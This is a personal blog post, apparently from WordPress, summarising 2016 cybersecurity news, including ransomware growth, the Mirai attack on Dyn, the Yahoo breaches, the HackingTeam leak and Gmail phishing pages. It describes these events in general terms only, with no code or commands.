My Summary of Cyber Security in 2016

In early 2016 security researchers across the world noticed an increase in ransomware. In fact, it was an estimated 200-400% rise in the number of ransomware infections. Such ransomware families included TeslaCrypt, Cerber, Jigsaw and many others that were propagated in many different forms – Malvertising, File-Sharing and compromised websites.

For a lot of 2016, the US presidential election was headlines in a lot of the world, with Trump being ridiculed due to his policies and beliefs. The Clinton email scandal also evoked an investigation by the FBI, which concluded that she was not guilty. However, this was denied by activists and people in the cyber-security industry with the release of the Clinton emails from the breach of her personal email server.

In August 2016, the British Parliament authorised a bill which would allow certain organisations and ISPs to spy and collect the data of British citizens and users of British internet connections. Soon after, the creator of the World Wide Web, Sir Tim Berners-Lee, tweeted “Dark, dark days”, as a reference to this bill. Some people took even more action by stating that they would be using the Tor Anonymity Network as well as VPNs in order to circumvent the collection of internet traffic.

WikiLeaks released emails from the Italian company HackingTeam, showing that they had targeted computer security companies, aiming to find vulnerabilities in their software, and then exploiting these to prevent their backdoor/spy programs from being detected. It was also revealed that they had worked with the British counterpart of the NSA – GCHQ – to gain a warrant in order to disassemble software belonging to the security companies. This warrant was supposedly issued by the foreign secretary of the United Kingdom sometime in early 2016. In the HackingTeam emails, it was discovered that they used ‘demo’ targets in order to provide a simulation of what their malware would do once the victims infrastructure had been infected. Their malware included Remote Access Trojans and backdoor programs running on various operating systems and infrastructures.

In late 2016, internet users across the world experienced the effects of the DDoS attack on Dyn’s services, caused by the Mirai botnet. This DDoS attack interrupted many services including Twitter, Soundcloud, Spotify and more. Security researchers found that the malware used by the botnet specifically targeted IoT devices, as well as home routers. Some hysteria found its way to Twitter, with some users claiming that Russia was behind the attack, however, security experts quickly concluded that the Mirai botnet was mainly based in the United States of America.

With ransomware on the rise, security vendors have been forced to take the necessary steps in order to protect their customers from ransomware. One such attempt was in the creation of ‘No More Ransom’ (https://nomoreransom.org) by Intel Security, Kaspersky Lab and various law enforcement agencies in many countries, aiming not only to help people who had been infected by ransomware, but also educate them about the growing threat currently facing today’s computer users. Some ransomware variants even allow victims to decrypt their files by infecting other people with the ransomware.

Yahoo was hit by two massive security breaches. The first one, released the information and personal data of around 500,000,000 people worldwide. The second, released the personal information of 1,000,000,000 users worldwide. In both instances, Yahoo claimed that it was a state-sponsored attack, which explains why the breached data has not been released to the public yet. However, some security researchers, such as Troy Hunt, suggested that the phrase ‘state-sponsored’ was simply used to make the breach seem less important to victims, resulting in the victims dismissing the breach as a minor incident.

2016 also saw a large number of phishing attacks utilising services such as Gmail and Hotmail, in order to trick users into clicking on fake attachments. These fake attachments would then open a raw html page in the browser, which was disguised in order to look like the Google login page. These fake login pages contained keylogger scripts (usually in JavaScript) that would send the keystrokes of the victim to the threat actor behind the phishing attack. If the keylogger failed, the username and password would be sent to the attacker when the user clicked the submit / login button. The user wouldn’t notice anything, as once the user “logged in”, they would be redirected to the real email website.

With 2016 coming to an end, I want to wish everyone a happy holiday! In terms of Information Security, 2016 has been a crazy year. I used various services / information sources to research this year’s events before writing this blog post. They can be found below:

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s